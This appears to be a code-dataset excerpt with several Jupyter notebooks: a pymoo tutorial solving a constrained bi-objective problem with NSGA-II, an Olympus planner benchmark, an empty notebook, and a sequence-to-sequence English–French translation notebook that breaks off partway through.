hexsha stringlengths 40 40 | size int64 6 14.9M | ext stringclasses 1 value | lang stringclasses 1 value | max_stars_repo_path stringlengths 6 260 | max_stars_repo_name stringlengths 6 119 | max_stars_repo_head_hexsha stringlengths 40 41 | max_stars_repo_licenses sequence | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 6 260 | max_issues_repo_name stringlengths 6 119 | max_issues_repo_head_hexsha stringlengths 40 41 | max_issues_repo_licenses sequence | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 6 260 | max_forks_repo_name stringlengths 6 119 | max_forks_repo_head_hexsha stringlengths 40 41 | max_forks_repo_licenses sequence | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | avg_line_length float64 2 1.04M | max_line_length int64 2 11.2M | alphanum_fraction float64 0 1 | cells sequence | cell_types sequence | cell_type_groups sequence |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e705c52065438e591fd50c12e3bff5fba9a27257 | 89,225 | ipynb | Jupyter Notebook | source/getting_started/part_2.ipynb | SunTzunami/pymoo-doc | f82d8908fe60792d49a7684c4bfba4a6c1339daf | [
"Apache-2.0"
] | 2 | 2021-09-11T06:43:49.000Z | 2021-11-10T13:36:09.000Z | source/getting_started/part_2.ipynb | SunTzunami/pymoo-doc | f82d8908fe60792d49a7684c4bfba4a6c1339daf | [
"Apache-2.0"
] | 3 | 2021-09-21T14:04:47.000Z | 2022-03-07T13:46:09.000Z | source/getting_started/part_2.ipynb | SunTzunami/pymoo-doc | f82d8908fe60792d49a7684c4bfba4a6c1339daf | [
"Apache-2.0"
] | 3 | 2021-10-09T02:47:26.000Z | 2022-02-10T07:02:37.000Z | 169.952381 | 38,684 | 0.862763 | [
[
[
".. meta::\n :description: A guide which introduces the most important steps to get started with pymoo, an open-source multi-objective optimization framework in Python.",
"_____no_output_____"
],
[
".. meta::\n :keywords: Multi-objective Optimization, Python, Evolutionary Computation, Optimization Test Problem, Hypervolume",
"_____no_output_____"
]
],
[
[
".. _nb_getting_started_part2:",
"_____no_output_____"
]
],
[
[
"# Part II: Find a Solution Set using Multi-objective Optimization",
"_____no_output_____"
],
[
"The constrained bi-objective problem from Part I was defined by",
"_____no_output_____"
],
[
"\\begin{align} \n\\begin{split}\n\\min \\;\\; & f_1(x) = 100 \\, (x_1^2 + x_2^2) \\\\ \n\\max \\;\\; & f_2(x) = -(x_1-1)^2 - x_2^2 \\\\[1mm]\n\\text{s.t.} \\;\\; & g_1(x) = 2 \\, (x_1 - 0.1) \\, (x_1 - 0.9) \\leq 0\\\\ \n& g_2(x) = 20 \\, (x_1 - 0.4) \\, (x_1 - 0.6) \\geq 0\\\\[1mm] \n& -2 \\leq x_1 \\leq 2 \\\\\n& -2 \\leq x_2 \\leq 2\\\\[1mm] \n& x \\in \\mathbb{R}\n\\end{split}\n\\end{align}",
"_____no_output_____"
],
[
"To implement the problem in **pymoo** some more work has to be done. ",
"_____no_output_____"
]
],
[
[
".. admonition:: Problem Definition\n :class: myOwnStyle\n\n Most optimization frameworks commit to either minimize or maximize all objectives and to have only :math:`\\leq` or :math:`\\geq` constraints. In pymoo, each objective function is supposed to be **minimized**, and each constraint needs to be provided in the form of :math:`\\leq 0`.",
"_____no_output_____"
]
],
[
[
"Thus, we need to multiple an objective that is supposed to be maximized by $-1$ and minimize it. This results in minimizing $-f_2(x)$ instead of maximizing $f_2(x)$. \n\nMoreover, the inequality constraints need to be formulated as **less than zero** ($\\leq 0$) constraint. \nFor this reason, $g_2(x)$ is multiplied by $-1$ in order to flip inequality relation. \nAlso, we recommend the normalization of constraints to make them operating on the same scale and giving them equal importance. For $g_1(x)$, the coefficient results in $2 \\cdot (-0.1) \\cdot (-0.9) = 0.18$ and for $g_2(x)$ in $20 \\cdot (-0.4) \\cdot (-0.6) = 4.8$, respectively. We achieve normalization of constraints by dividing $g_1(x)$ and $g_2(x)$ by its corresponding coefficient.",
"_____no_output_____"
],
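[
"As a quick, hypothetical sanity check (not part of the original tutorial), the normalization above can be verified with plain Python arithmetic at a sample point $x_1 = 0.5$:\n\n```python\nx1 = 0.5\ng1_raw = 2 * (x1 - 0.1) * (x1 - 0.9)      # raw value of g1\ng2_raw = -20 * (x1 - 0.4) * (x1 - 0.6)    # g2 with the sign flipped to <= 0 form\nprint(g1_raw / 0.18, g2_raw / 4.8)        # both now operate on a comparable scale\n```",
"_____no_output_____"
],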
[
"After these reformulations the problem to be implemented is given by:\n\n\\begin{align} \n\\label{eq:getting_started_pymoo}\n\\begin{split}\n\\min \\;\\; & f_1(x) = 100 \\, (x_1^2 + x_2^2) \\\\ \n\\min \\;\\; & f_2(x) = (x_1-1)^2 + x_2^2 \\\\[1mm] \n\\text{s.t.} \\;\\; & g_1(x) = 2 \\, (x_1 - 0.1) \\, (x_1 - 0.9) \\, / \\, 0.18 \\leq 0\\\\ \n& g_2(x) = - 20 \\, (x_1 - 0.4) \\, (x_1 - 0.6) \\, / \\, 4.8 \\leq 0\\\\[1mm] \n& -2 \\leq x_1 \\leq 2 \\\\\n& -2 \\leq x_2 \\leq 2\\\\[1mm] \n& x \\in \\mathbb{R}\n\\end{split}\n\\end{align}\n\n",
"_____no_output_____"
],
[
"## Implement the Problem",
"_____no_output_____"
],
[
"After having formulated the problem the right way, we can start implementing it. In this tutorial we the element-wise problem definition, which is one out of three different ways for implementing a problem. We define a new Python objective inheriting from `ElementwiseProblem` and set the correct attributes, such as the number of objectives (`n_obj`) and constraints (`n_constr`) and the lower (`xl`) and upper bounds (`xu`). The function being responsible for the evaluation is `_evaluate` which shall be implemented next. The function's interface is the parameters `x` and `out`. For this element-wise implementation `x` is a **one**-dimensional NumPy array of length `n_var` which represents a single solution to be evaluated. The output is supposed to be written to the dictionary `out`. The objective values should be written to `out[\"F\"]` as a list of NumPy array with length of `n_obj` and the constraints to `out[\"G\"]` with length of `n_constr` (if the problem has constraints to be satisfied at all).",
"_____no_output_____"
]
],
[
[
"import numpy as np\nfrom pymoo.core.problem import ElementwiseProblem\n\nclass MyProblem(ElementwiseProblem):\n\n def __init__(self):\n super().__init__(n_var=2, \n n_obj=2, \n n_constr=2, \n xl=np.array([-2,-2]), \n xu=np.array([2,2]))\n\n def _evaluate(self, x, out, *args, **kwargs):\n f1 = 100 * (x[0]**2 + x[1]**2)\n f2 = (x[0]-1)**2 + x[1]**2\n \n g1 = 2*(x[0]-0.1) * (x[0]-0.9) / 0.18\n g2 = - 20*(x[0]-0.4) * (x[0]-0.6) / 4.8\n \n out[\"F\"] = [f1, f2]\n out[\"G\"] = [g1, g2]\n \n\nproblem = MyProblem()",
"_____no_output_____"
]
],
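[
[
"Before running an optimization, it can be worth evaluating the problem at a single point. A minimal sketch, assuming `Problem.evaluate` supports the `return_values_of` argument as in recent pymoo versions:\n\n```python\nimport numpy as np\n\n# hypothetical quick check of a single solution\nF, G = problem.evaluate(np.array([0.5, 0.5]), return_values_of=[\"F\", \"G\"])\nprint(F, G)\n```",
"_____no_output_____"
]
],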
[
[
".. tip::\n A problem can be defined in a couple of different ways. Above, the implementation of an **element-wise** implementation is demonstrated, which means the `_evaluate` is called for each solution `x` at a time. Other ways of implementing a problem are **vectorized**, where `x` represents a whole set of solutions or a **functional** and probably more pythonic way by providing for each objective and constraint as a function. For more details, please have a look at the Problem tutorial.",
"_____no_output_____"
]
],
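[
[
"To make the tip above concrete, here is a minimal sketch of the **vectorized** variant of the same problem, assuming the `Problem` base class from `pymoo.core.problem` passes the whole population to `_evaluate` as a 2-D matrix `x` (one row per solution):\n\n```python\nimport numpy as np\nfrom pymoo.core.problem import Problem\n\nclass MyVectorizedProblem(Problem):\n\n    def __init__(self):\n        super().__init__(n_var=2, n_obj=2, n_constr=2,\n                         xl=np.array([-2, -2]), xu=np.array([2, 2]))\n\n    def _evaluate(self, x, out, *args, **kwargs):\n        # x has shape (n_solutions, n_var); evaluate all rows at once\n        f1 = 100 * (x[:, 0]**2 + x[:, 1]**2)\n        f2 = (x[:, 0] - 1)**2 + x[:, 1]**2\n        g1 = 2 * (x[:, 0] - 0.1) * (x[:, 0] - 0.9) / 0.18\n        g2 = -20 * (x[:, 0] - 0.4) * (x[:, 0] - 0.6) / 4.8\n        out[\"F\"] = np.column_stack([f1, f2])\n        out[\"G\"] = np.column_stack([g1, g2])\n```",
"_____no_output_____"
]
],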
[
[
"If you use **pymoo** as a researcher trying to improve existing algorithms, you might want to have a look at the varierity of single- and many-objective optimization test problems already implemented. ",
"_____no_output_____"
],
[
"[Optimization Test Problems](../problems/index.ipynb) | \n[Define a Custom Problem](../problems/definition.ipynb) | \n[Parallelization](../problems/parallelization.ipynb) |\n[Callback](../interface/callback.ipynb) |\n[Constraint Handling](../misc/constraints.ipynb)",
"_____no_output_____"
],
[
"## Initialize an Algorithm",
"_____no_output_____"
],
[
"The reason why you became aware of this framework, is probably the existence of an algorithm you like to use. \n*pymoo* follows an object oriented approach and, thus, we have to define an algorithm object next. \nDepending on the optimization problem, different algorithms will perform better or worse on different kind of problems. It is recommendable to first understand the intuition behind an algorithm and then select one which seems to be most suitable for solving your optimization problem. A list of algorithms which are available in *pymoo* is available [here](../algorithms/index.ipynb).",
"_____no_output_____"
],
[
"In our case, the optimization problem is rather simple, but the aspect of having two objectives and two constraints should be considered. Thus, let us select the well-known multi-objective algorithm [NSGA-II](../algorithms/moo/nsga2.ipynb). \nFor the majority of algorithms you could either choose the default hyper-parameters or create your own version of the algorithm by modifying them.\nFor instance, for this relatively simple problem we choose a population size of 40 (`pop_size=40`) and with only 10 (`n_offsprings=10`) in each generation. \nSuch an implementation is a greedier variant and improves the convergence of simpler optimization problems without major difficulties regarding optimization, such as the existence of local Pareto-fronts.\nMoreover, we enable a duplicate check (`eliminate_duplicates=True`), making sure that the mating produces offsprings that are different from themselves and the existing population regarding their design space values. ",
"_____no_output_____"
]
],
[
[
"from pymoo.algorithms.moo.nsga2 import NSGA2\nfrom pymoo.factory import get_sampling, get_crossover, get_mutation\n\nalgorithm = NSGA2(\n pop_size=40,\n n_offsprings=10,\n sampling=get_sampling(\"real_random\"),\n crossover=get_crossover(\"real_sbx\", prob=0.9, eta=15),\n mutation=get_mutation(\"real_pm\", eta=20),\n eliminate_duplicates=True\n)\n",
"_____no_output_____"
]
],
[
[
"The `algorithm` object contains an implementation of NSGA-II with the custom configuration discussed above. The object can now be used to start an optimization run.",
"_____no_output_____"
]
],
[
[
".. tip::\n The documentation is designed to make it easy to get started and to copy code for each of the algorithms. However, please be aware that each algorithm comes with all kinds of hyper-parameters to be considered. If an algorithm turns out not to show a good convergence behavior, we encourage you to try different algorithm configurations. For instance, for population-based approaches the population size and number of offsprings, as well as the parameters used for recombination operators are a good starting point.",
"_____no_output_____"
]
],
[
[
"## Define a Termination Criterion\n\nFurthermore, a termination criterion needs to be defined to start the optimization procedure. Most common ways of defining the termination is by limiting the overall number of function evaluations or simply the number of iterations of the algorithm.\nMoreover, some algorithms already have implemented their own, for instance Nelder-Mead when the simplex becomes degenerated or CMA-ES where a vendor library is used. \nBecause of the simplicity of this problem we use a rather small number of 40 iteration of the algorithm. ",
"_____no_output_____"
]
],
[
[
"from pymoo.factory import get_termination\n\ntermination = get_termination(\"n_gen\", 40)",
"_____no_output_____"
]
],
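[
[
"Other criteria can be constructed the same way. A hedged sketch of two alternatives, assuming the keys \"n_eval\" and \"time\" are registered in `pymoo.factory` as in recent versions:\n\n```python\nfrom pymoo.factory import get_termination\n\n# stop after 1,000 function evaluations\ntermination_by_evals = get_termination(\"n_eval\", 1000)\n\n# or stop after 10 seconds of wall-clock time\ntermination_by_time = get_termination(\"time\", \"00:00:10\")\n```",
"_____no_output_____"
]
],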
[
[
".. tip::\n A convergence analysis will show how much progress an algorithm has made at what time. Always keep in mind that having the most suitable algorithm but running it not long enough might prevent from finding the global optimum. However, continuing with optimization of an algorithm that got stuck or has already found the optimum will not improve the best found solution and unnecessarily increase the number of function evaluations.",
"_____no_output_____"
],
[
"You can find a list and explanations of termination criteria available in *pymoo* [here](../interface/termination.ipynb). If no termination criteria is defined, then the progress in the design and objective space will kept track of in each iteration. When no significant progress has been made (this is the art of defining what that shall be), the algorithm terminates. ",
"_____no_output_____"
],
[
"## Optimize",
"_____no_output_____"
],
[
"Finally, we are solving the `problem` with the `algorithm` and `termination` we have defined. The functional interface uses the `minimize` method. By default, the `minimize` performs deep-copies of the algorithm and the termination object which guarantees they are not modified during the function call. This is important to ensure that repetitive function calls with the same random seed end up with the same results. When the algorithm has been terminated, the `minimize` function returns a [Result](../interface/result.ipynb) object.",
"_____no_output_____"
]
],
[
[
"from pymoo.optimize import minimize\n\nres = minimize(problem,\n algorithm,\n termination,\n seed=1,\n save_history=True,\n verbose=True)\n\nX = res.X\nF = res.F",
"=====================================================================================\nn_gen | n_eval | cv (min) | cv (avg) | n_nds | eps | indicator \n=====================================================================================\n 1 | 40 | 0.00000E+00 | 2.36399E+01 | 1 | - | -\n 2 | 50 | 0.00000E+00 | 1.15486E+01 | 1 | 0.00000E+00 | f\n 3 | 60 | 0.00000E+00 | 5.277918607 | 1 | 0.00000E+00 | f\n 4 | 70 | 0.00000E+00 | 2.406068542 | 2 | 1.000000000 | ideal\n 5 | 80 | 0.00000E+00 | 0.908316880 | 3 | 0.869706146 | ideal\n 6 | 90 | 0.00000E+00 | 0.264746300 | 3 | 0.00000E+00 | f\n 7 | 100 | 0.00000E+00 | 0.054063822 | 4 | 0.023775686 | ideal\n 8 | 110 | 0.00000E+00 | 0.003060876 | 5 | 0.127815454 | ideal\n 9 | 120 | 0.00000E+00 | 0.00000E+00 | 6 | 0.085921728 | ideal\n 10 | 130 | 0.00000E+00 | 0.00000E+00 | 7 | 0.015715204 | f\n 11 | 140 | 0.00000E+00 | 0.00000E+00 | 8 | 0.015076323 | f\n 12 | 150 | 0.00000E+00 | 0.00000E+00 | 7 | 0.026135665 | f\n 13 | 160 | 0.00000E+00 | 0.00000E+00 | 10 | 0.010026699 | f\n 14 | 170 | 0.00000E+00 | 0.00000E+00 | 11 | 0.011833783 | f\n 15 | 180 | 0.00000E+00 | 0.00000E+00 | 12 | 0.008294035 | f\n 16 | 190 | 0.00000E+00 | 0.00000E+00 | 14 | 0.006095993 | ideal\n 17 | 200 | 0.00000E+00 | 0.00000E+00 | 17 | 0.002510398 | ideal\n 18 | 210 | 0.00000E+00 | 0.00000E+00 | 20 | 0.003652660 | f\n 19 | 220 | 0.00000E+00 | 0.00000E+00 | 20 | 0.010131820 | nadir\n 20 | 230 | 0.00000E+00 | 0.00000E+00 | 21 | 0.005676014 | f\n 21 | 240 | 0.00000E+00 | 0.00000E+00 | 25 | 0.010464402 | f\n 22 | 250 | 0.00000E+00 | 0.00000E+00 | 25 | 0.000547515 | f\n 23 | 260 | 0.00000E+00 | 0.00000E+00 | 28 | 0.001050255 | f\n 24 | 270 | 0.00000E+00 | 0.00000E+00 | 33 | 0.003841298 | f\n 25 | 280 | 0.00000E+00 | 0.00000E+00 | 37 | 0.006664377 | nadir\n 26 | 290 | 0.00000E+00 | 0.00000E+00 | 40 | 0.000963164 | f\n 27 | 300 | 0.00000E+00 | 0.00000E+00 | 40 | 0.000678243 | f\n 28 | 310 | 0.00000E+00 | 0.00000E+00 | 40 | 0.000815766 | f\n 29 | 320 | 0.00000E+00 | 0.00000E+00 | 40 | 0.001500814 | f\n 30 | 330 | 0.00000E+00 | 0.00000E+00 | 40 | 0.014706442 | nadir\n 31 | 340 | 0.00000E+00 | 0.00000E+00 | 40 | 0.003554320 | ideal\n 32 | 350 | 0.00000E+00 | 0.00000E+00 | 40 | 0.000624123 | f\n 33 | 360 | 0.00000E+00 | 0.00000E+00 | 40 | 0.000203925 | f\n 34 | 370 | 0.00000E+00 | 0.00000E+00 | 40 | 0.001048509 | f\n 35 | 380 | 0.00000E+00 | 0.00000E+00 | 40 | 0.001121103 | f\n 36 | 390 | 0.00000E+00 | 0.00000E+00 | 40 | 0.000664461 | f\n 37 | 400 | 0.00000E+00 | 0.00000E+00 | 40 | 0.000761066 | f\n 38 | 410 | 0.00000E+00 | 0.00000E+00 | 40 | 0.000521906 | f\n 39 | 420 | 0.00000E+00 | 0.00000E+00 | 40 | 0.004652095 | nadir\n 40 | 430 | 0.00000E+00 | 0.00000E+00 | 40 | 0.000287847 | f\n"
]
],
[
[
"If the `verbose=True`, some printouts during the algorithm's execution are provided. This can vary from algorithm to algorithm. Here, we execute `NSGA2` on a problem where *pymoo* has no knowledge about the optimum. Each line represents one iteration. The first two columns are the current generation counter and the number of evaluations so far. For constrained problems, the next two columns show the minimum constraint violation (*cv (min)*) and the average constraint violation (*cv (avg)*) in the current population. This is followed by the number of non-dominated solutions (*n_nds*) and two more metrics which represents the movement in the objective space. ",
"_____no_output_____"
]
],
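[
[
"Because `save_history=True` was passed to `minimize`, a snapshot of the algorithm is stored for each iteration. A minimal sketch of inspecting it, assuming each entry of `res.history` holds an algorithm object with an `opt` attribute (the current non-dominated set), as in recent pymoo versions:\n\n```python\n# number of stored iterations and size of the final non-dominated set\nprint(len(res.history))\nprint(len(res.history[-1].opt))\n```",
"_____no_output_____"
]
],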
[
[
".. tip::\n An algorithm can be executed by using the **minimize** interface as shown below. In order to have more control over the algorithm execution, pymoo also offers an **object-oriented** execution. For an example and a discussion of each's pros and cons, please consult or algorithm tutorial. ",
"_____no_output_____"
]
],
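[
[
"For reference, a minimal sketch of the object-oriented execution mentioned in the tip above, assuming the algorithm object exposes `setup`, `has_next`, `next` and `result` as in recent pymoo versions:\n\n```python\nimport copy\n\n# work on a copy so the original algorithm object stays untouched\nobj = copy.deepcopy(algorithm)\nobj.setup(problem, termination=termination, seed=1)\nwhile obj.has_next():\n    obj.next()\nres_oo = obj.result()\n```",
"_____no_output_____"
]
],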
[
[
"## Visualize",
"_____no_output_____"
],
[
"Analyzing the solutions being found by the algorithm is vital. Always a good start is visualizing the solutions to get a grasp of commonalities or if the Pareto-front is known to even check the convergence.",
"_____no_output_____"
]
],
[
[
"import matplotlib.pyplot as plt\nxl, xu = problem.bounds()\nplt.figure(figsize=(7, 5))\nplt.scatter(X[:, 0], X[:, 1], s=30, facecolors='none', edgecolors='r')\nplt.xlim(xl[0], xu[0])\nplt.ylim(xl[1], xu[1])\nplt.title(\"Design Space\")\nplt.show()",
"_____no_output_____"
],
[
"plt.figure(figsize=(7, 5))\nplt.scatter(F[:, 0], F[:, 1], s=30, facecolors='none', edgecolors='blue')\nplt.title(\"Objective Space\")\nplt.show()",
"_____no_output_____"
]
]
] | [
"markdown",
"raw",
"markdown",
"raw",
"markdown",
"code",
"raw",
"markdown",
"code",
"markdown",
"raw",
"markdown",
"code",
"markdown",
"code",
"markdown",
"raw",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"raw"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"raw"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"raw"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"raw"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"raw"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
]
] |
e705d34b29532d9f8c2af7e76f0006079c28f4e7 | 51,777 | ipynb | Jupyter Notebook | notebooks/.ipynb_checkpoints/model_inspection-checkpoint.ipynb | gs246/Causal.jl | a667a24638415710333af760409566cc6f5dc681 | [
"MIT"
] | 56 | 2020-02-16T17:13:10.000Z | 2020-08-21T04:43:59.000Z | notebooks/.ipynb_checkpoints/model_inspection-checkpoint.ipynb | gs246/Causal.jl | a667a24638415710333af760409566cc6f5dc681 | [
"MIT"
] | 26 | 2020-08-24T07:48:01.000Z | 2022-02-21T07:07:21.000Z | notebooks/.ipynb_checkpoints/model_inspection-checkpoint.ipynb | gs246/Causal.jl | a667a24638415710333af760409566cc6f5dc681 | [
"MIT"
] | 8 | 2020-09-01T18:08:14.000Z | 2022-03-22T12:33:06.000Z | 92.294118 | 838 | 0.591363 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
e705d51cf88dfa476d99b81130f6f592c1530ad3 | 35,674 | ipynb | Jupyter Notebook | docs/source/examples/notebooks/simple_benchmark.ipynb | priyansh-1902/olympus | f57ad769918c0d5d805c439ab5ffbd180af698fa | [
"MIT"
] | 36 | 2020-10-10T14:05:40.000Z | 2022-02-12T07:21:47.000Z | docs/source/examples/notebooks/simple_benchmark.ipynb | priyansh-1902/olympus | f57ad769918c0d5d805c439ab5ffbd180af698fa | [
"MIT"
] | 12 | 2020-10-14T09:04:06.000Z | 2021-10-01T19:25:34.000Z | docs/source/examples/notebooks/simple_benchmark.ipynb | priyansh-1902/olympus | f57ad769918c0d5d805c439ab5ffbd180af698fa | [
"MIT"
] | 8 | 2020-10-24T12:43:45.000Z | 2022-02-12T07:21:50.000Z | 258.507246 | 33,080 | 0.930201 | [
[
[
"# Run a simple benchmark",
"_____no_output_____"
]
],
[
[
"# import olympus\nfrom olympus import Olympus\nfrom olympus import Campaign",
"_____no_output_____"
],
[
"# create olympus\nolymp = Olympus()",
"_____no_output_____"
],
[
"# run olympus for specific experimentation scenario\nolymp.run(dataset='alkox', planner='hyperopt', campaign=Campaign())",
"\u001b[0;37m[INFO] Loading emulator using a BayesNeuralNet model for the dataset alkox...\n\u001b[0m"
],
[
"# run olympus with another planner\nolymp.run(dataset='alkox', planner='gpyopt', campaign=Campaign())",
"\u001b[0;37m[INFO] Loading emulator using a BayesNeuralNet model for the dataset alkox...\n\u001b[0m"
]
],
[
[
"### Plot results",
"_____no_output_____"
]
],
[
[
"from olympus import Plotter",
"_____no_output_____"
],
[
"plotter = Plotter()\nplotter.plot_from_db(olymp.evaluator.database)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
e705d6f46d6851d0795de57d36820f3be22249ca | 209,065 | ipynb | Jupyter Notebook | dlnd_language_translation.ipynb | Arish813/Language-translation-using-RNN | d6dc6862d38cf3f732e1d0b3b3c50837a66dd060 | [
"MIT"
] | null | null | null | dlnd_language_translation.ipynb | Arish813/Language-translation-using-RNN | d6dc6862d38cf3f732e1d0b3b3c50837a66dd060 | [
"MIT"
] | null | null | null | dlnd_language_translation.ipynb | Arish813/Language-translation-using-RNN | d6dc6862d38cf3f732e1d0b3b3c50837a66dd060 | [
"MIT"
] | null | null | null | 75.095187 | 577 | 0.617803 | [
[
[
"# Language Translation\nIn this project, you’re going to take a peek into the realm of neural network machine translation. You’ll be training a sequence to sequence model on a dataset of English and French sentences that can translate new sentences from English to French.\n## Get the Data\nSince translating the whole language of English to French will take lots of time to train, we have provided you with a small portion of the English corpus.",
"_____no_output_____"
]
],
[
[
"\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nimport helper\nimport problem_unittests as tests\n\nsource_path = 'data/small_vocab_en'\ntarget_path = 'data/small_vocab_fr'\nsource_text = helper.load_data(source_path)\ntarget_text = helper.load_data(target_path)",
"_____no_output_____"
]
],
[
[
"## Explore the Data\nPlay around with view_sentence_range to view different parts of the data.",
"_____no_output_____"
]
],
[
[
"view_sentence_range = (0, 10)\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nimport numpy as np\n\nprint('Dataset Stats')\nprint('Roughly the number of unique words: {}'.format(len({word: None for word in source_text.split()})))\n\nsentences = source_text.split('\\n')\nword_counts = [len(sentence.split()) for sentence in sentences]\nprint('Number of sentences: {}'.format(len(sentences)))\nprint('Average number of words in a sentence: {}'.format(np.average(word_counts)))\n\nprint()\nprint('English sentences {} to {}:'.format(*view_sentence_range))\nprint('\\n'.join(source_text.split('\\n')[view_sentence_range[0]:view_sentence_range[1]]))\nprint()\nprint('French sentences {} to {}:'.format(*view_sentence_range))\nprint('\\n'.join(target_text.split('\\n')[view_sentence_range[0]:view_sentence_range[1]]))",
"Dataset Stats\nRoughly the number of unique words: 227\nNumber of sentences: 137861\nAverage number of words in a sentence: 13.225277634719028\n\nEnglish sentences 0 to 10:\nnew jersey is sometimes quiet during autumn , and it is snowy in april .\nthe united states is usually chilly during july , and it is usually freezing in november .\ncalifornia is usually quiet during march , and it is usually hot in june .\nthe united states is sometimes mild during june , and it is cold in september .\nyour least liked fruit is the grape , but my least liked is the apple .\nhis favorite fruit is the orange , but my favorite is the grape .\nparis is relaxing during december , but it is usually chilly in july .\nnew jersey is busy during spring , and it is never hot in march .\nour least liked fruit is the lemon , but my least liked is the grape .\nthe united states is sometimes busy during january , and it is sometimes warm in november .\n\nFrench sentences 0 to 10:\nnew jersey est parfois calme pendant l' automne , et il est neigeux en avril .\nles états-unis est généralement froid en juillet , et il gèle habituellement en novembre .\ncalifornia est généralement calme en mars , et il est généralement chaud en juin .\nles états-unis est parfois légère en juin , et il fait froid en septembre .\nvotre moins aimé fruit est le raisin , mais mon moins aimé est la pomme .\nson fruit préféré est l'orange , mais mon préféré est le raisin .\nparis est relaxant en décembre , mais il est généralement froid en juillet .\nnew jersey est occupé au printemps , et il est jamais chaude en mars .\nnotre fruit est moins aimé le citron , mais mon moins aimé est le raisin .\nles états-unis est parfois occupé en janvier , et il est parfois chaud en novembre .\n"
]
],
[
[
"## Implement Preprocessing Function\n### Text to Word Ids\nAs you did with other RNNs, you must turn the text into a number so the computer can understand it. In the function `text_to_ids()`, you'll turn `source_text` and `target_text` from words to ids. However, you need to add the `<EOS>` word id at the end of each sentence from `target_text`. This will help the neural network predict when the sentence should end.\n\nYou can get the `<EOS>` word id by doing:\n```python\ntarget_vocab_to_int['<EOS>']\n```\nYou can get other word ids using `source_vocab_to_int` and `target_vocab_to_int`.",
"_____no_output_____"
]
],
[
[
"def text_to_ids(source_text, target_text, source_vocab_to_int, target_vocab_to_int):\n \"\"\"\n Convert source and target text to proper word ids\n :param source_text: String that contains all the source text.\n :param target_text: String that contains all the target text.\n :param source_vocab_to_int: Dictionary to go from the source words to an id\n :param target_vocab_to_int: Dictionary to go from the target words to an id\n :return: A tuple of lists (source_id_text, target_id_text)\n \"\"\"\n # TODO: Implement Function\n eos= source_vocab_to_int['<EOS>']\n source_id_text= [[source_vocab_to_int[word] for word in sentence.split()]\\\n for sentence in source_text.split('\\n')]\n target_id_text= [[target_vocab_to_int[word] for word in sentence.split()]+[eos]\\\n for sentence in target_text.split('\\n')]\n return source_id_text,target_id_text\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_text_to_ids(text_to_ids)",
"Tests Passed\n"
]
],
[
[
"### Preprocess all the data and save it\nRunning the code cell below will preprocess all the data and save it to file.",
"_____no_output_____"
]
],
[
[
"\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nhelper.preprocess_and_save_data(source_path, target_path, text_to_ids)",
"_____no_output_____"
]
],
[
[
"# Check Point\nThis is your first checkpoint. If you ever decide to come back to this notebook or have to restart the notebook, you can start from here. The preprocessed data has been saved to disk.",
"_____no_output_____"
]
],
[
[
"\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nimport numpy as np\nimport helper\n\n(source_int_text, target_int_text), (source_vocab_to_int, target_vocab_to_int), _ = helper.load_preprocess()",
"_____no_output_____"
]
],
[
[
"### Check the Version of TensorFlow and Access to GPU\nThis will check to make sure you have the correct version of TensorFlow and access to a GPU",
"_____no_output_____"
]
],
[
[
"\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nfrom distutils.version import LooseVersion\nimport warnings\nimport tensorflow as tf\n\n# Check TensorFlow Version\nassert LooseVersion(tf.__version__) in [LooseVersion('1.0.0'), LooseVersion('1.0.1')], 'This project requires TensorFlow version 1.0 You are using {}'.format(tf.__version__)\nprint('TensorFlow Version: {}'.format(tf.__version__))\n\n# Check for a GPU\nif not tf.test.gpu_device_name():\n warnings.warn('No GPU found. Please use a GPU to train your neural network.')\nelse:\n print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))",
"TensorFlow Version: 1.0.0\nDefault GPU Device: /gpu:0\n"
],
[
"print(tf.__version__)",
"1.0.0\n"
]
],
[
[
"## Build the Neural Network\nYou'll build the components necessary to build a Sequence-to-Sequence model by implementing the following functions below:\n- `model_inputs`\n- `process_decoding_input`\n- `encoding_layer`\n- `decoding_layer_train`\n- `decoding_layer_infer`\n- `decoding_layer`\n- `seq2seq_model`\n\n### Input\nImplement the `model_inputs()` function to create TF Placeholders for the Neural Network. It should create the following placeholders:\n\n- Input text placeholder named \"input\" using the TF Placeholder name parameter with rank 2.\n- Targets placeholder with rank 2.\n- Learning rate placeholder with rank 0.\n- Keep probability placeholder named \"keep_prob\" using the TF Placeholder name parameter with rank 0.\n\nReturn the placeholders in the following the tuple (Input, Targets, Learing Rate, Keep Probability)",
"_____no_output_____"
]
],
[
[
